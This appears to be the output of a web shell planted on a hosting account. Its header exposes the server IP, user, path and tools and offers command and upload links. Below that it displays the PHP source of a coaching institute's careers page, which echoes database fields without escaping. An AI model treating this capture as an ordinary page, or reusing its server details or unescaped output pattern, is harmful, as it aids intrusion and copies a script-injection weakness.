Server IP : 103.53.40.154 / Your IP : 3.12.73.149 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leetcoaching.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include("top-link.php") ?> <title>Career | Leet Coaching Institute In New Delhi</title> <meta name="description" content="Mission Engineering is Delhiās leading LEET coaching institute, offering expert guidance and personalized training to maximize your entrance exam success."> </head> <body> <?php include("header.php"); ?> <main> <div class="it-breadcrumb-area it-breadcrumb-bg" data-background="<?php echo $wspath;?>assets/img/breadcrumb/breadcrumb.jpg"> <div class="container"> <div class="row "> <div class="col-md-12"> <div class="it-breadcrumb-content z-index-3 text-center"> <div class="it-breadcrumb-title-box"> <h1 class="it-breadcrumb-title">Career</h1> </div> <div class="it-breadcrumb-list-wrap"> <div class="it-breadcrumb-list"> <span><a href="<?php echo $wspath;?>">home</a></span> <span class="dvdr">//</span> <span>Career</span> </div> </div> </div> </div> </div> </div> </div> <div class="container pt-3"> <div class="table-responsive"> <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0"> <thead> <tr> <th>Sr. No.</th> <th>Subject</th> <th>Qualification</th> <th>Experiance</th> <th>Sallery</th> <th>Apply</th> </tr> </thead> <tbody> <?php $sql = "SELECT * FROM `tbl_career`"; $run = mysqli_query($db,$sql) or die("Query Not run"); while($data = mysqli_fetch_assoc($run)){ if(mysqli_num_rows($run) > 0){ $count++; ?> <tr> <td><?php echo $count?></td> <td><?php echo $data['subject']?></td> <td><?php echo $data['qualification']?></td> <td><?php echo $data['experience']?></td> <td><?php echo $data['sallery']?></td> <td> <a href="<?php echo $wspath ?>contact.html" class="it-btn w-100 text-center mb-20"> <span> Apply Here <svg width="17" height="14" viewBox="0 0 17 14" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11 1.24023L16 7.24023L11 13.2402" stroke="currentcolor" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round" /> <path d="M1 7.24023H16" stroke="currentcolor" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> </a></td> </tr> <?php } }?> </tbody> </table> </div> </div> </main> <?php include("footer.php"); ?> </body> </html>